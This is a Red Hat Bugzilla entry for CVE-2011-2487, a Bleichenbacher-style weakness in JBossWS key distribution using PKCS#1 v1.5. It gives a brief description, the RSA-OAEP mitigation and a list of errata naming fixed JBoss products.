This service will be undergoing maintenance at 00:00 UTC, 2016-09-28. It is expected to last about 1 hours
Bug 713539 - (CVE-2011-2487) CVE-2011-2487 jbossws: Prone to Bleichenbacher attack against to be distributed symmetric key
CVE-2011-2487 jbossws: Prone to Bleichenbacher attack against to be distribut...
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
Unspecified Unspecified
high Severity high
: ---
: ---
Assigned To: Red Hat Product Security
impact=important,public=20120904,repo...
: Security
Depends On: 883217 883218 883219 883220 883221 883222 918348
Blocks: 751414 789173 835396 849517 883225
  Show dependency treegraph
 
Reported: 2011-06-15 13:47 EDT by Jan Lieskovsky
Modified: 2015-07-31 08:44 EDT (History)
5 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2013-11-21 21:28:18 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)

  None (edit)
Description Jan Lieskovsky 2011-06-15 13:47:15 EDT
It was found that JBossWS, a J2EE Web Services server, leaked further
channel data, by using PKCS#1 v1.5 protocol family / public key encryption
scheme in order to distribute the symmetric key. A remote attacker, aware
of a cryptographic weakness of the PKCS#1 v1.5 public key encryption scheme,
could use this flaw to conduct chosen-encrypted-key attacks, leading to the
recovery of the entire plaintext form of the intended symmetric key, to be
distributed, by examining of the differences between SOAP responses, sent
from JBossWS server.

Acknowledgements:

Red Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum
for reporting this issue.
Comment 7 Jan Lieskovsky 2011-06-23 09:55:25 EDT
The CVE identifier of CVE-2011-2487 has been assigned to this issue.
Comment 33 David Jorm 2012-11-20 20:42:27 EST
Statement:

This flaw affects Apache CXF (WSS4J) and jbossws-native as shipped with various JBoss products. It does not affect JBoss Enterprise Application Platform 6 and JBoss Application Server 7.1.1 and above. These products include WSS4J 1.6.5, which incorporates a fix for this flaw. On affected products, this flaw can be mitigated by using the RSA-OAEP key wrap algorithm, instead of the default RSA-v1.5 algorithm. To use RSA-OAEP, edit the jboss-ws-security configuration file and add the property keyWrapAlgorithm="rsa_oaep" to the encrypt element.
Comment 36 Vincent Danen 2012-12-11 14:11:55 EST
Upstream advisory for Apache CXF:

http://cxf.apache.org/note-on-cve-2011-2487.html
Comment 37 errata-xmlrpc 2013-01-24 13:09:05 EST
This issue has been addressed in following products:

  JBoss Enterprise Application Platform 5.2.0

Via RHSA-2013:0194 https://rhn.redhat.com/errata/RHSA-2013-0194.html
Comment 38 errata-xmlrpc 2013-01-24 13:32:11 EST
This issue has been addressed in following products:

  JBEAP 5 for RHEL 5

Via RHSA-2013:0192 https://rhn.redhat.com/errata/RHSA-2013-0192.html
Comment 39 errata-xmlrpc 2013-01-24 13:32:57 EST
This issue has been addressed in following products:

  JBEAP 5 for RHEL 6

Via RHSA-2013:0191 https://rhn.redhat.com/errata/RHSA-2013-0191.html
Comment 40 errata-xmlrpc 2013-01-24 13:45:15 EST
This issue has been addressed in following products:

  JBEWP 5 for RHEL 6

Via RHSA-2013:0195 https://rhn.redhat.com/errata/RHSA-2013-0195.html
Comment 41 errata-xmlrpc 2013-01-24 13:46:00 EST
This issue has been addressed in following products:

  JBEAP 5 for RHEL 4

Via RHSA-2013:0193 https://rhn.redhat.com/errata/RHSA-2013-0193.html
Comment 42 errata-xmlrpc 2013-01-24 13:58:15 EST
This issue has been addressed in following products:

  JBEWP 5 for RHEL 4

Via RHSA-2013:0197 https://rhn.redhat.com/errata/RHSA-2013-0197.html
Comment 43 errata-xmlrpc 2013-01-24 13:59:07 EST
This issue has been addressed in following products:

  JBEWP 5 for RHEL 5

Via RHSA-2013:0196 https://rhn.redhat.com/errata/RHSA-2013-0196.html
Comment 44 errata-xmlrpc 2013-01-24 14:07:56 EST
This issue has been addressed in following products:

  JBoss Enterprise Web Platform 5.2.0

Via RHSA-2013:0198 https://rhn.redhat.com/errata/RHSA-2013-0198.html
Comment 45 errata-xmlrpc 2013-01-31 15:31:02 EST
This issue has been addressed in following products:

  JBoss Enterprise BRMS Platform 5.3.1

Via RHSA-2013:0221 https://rhn.redhat.com/errata/RHSA-2013-0221.html
Comment 46 errata-xmlrpc 2013-02-20 16:43:30 EST
This issue has been addressed in following products:

  JBoss Enterprise SOA Platform 5.3.1

Via RHSA-2013:0533 https://rhn.redhat.com/errata/RHSA-2013-0533.html
Comment 47 errata-xmlrpc 2013-06-18 10:49:02 EDT
This issue has been addressed in following products:

  Red Hat JBoss Portal 5.2.2

Via RHSA-2013:0953 https://rhn.redhat.com/errata/RHSA-2013-0953.html
Comment 48 errata-xmlrpc 2013-11-21 19:41:42 EST
This issue has been addressed in following products:

  Red Hat JBoss SOA Platform 4.3 CP05
  Red Hat JBoss Portal 4.3 CP07

Via RHSA-2013:1757 https://rhn.redhat.com/errata/RHSA-2013-1757.html

Note You need to log in before you can comment on or make changes to this bug.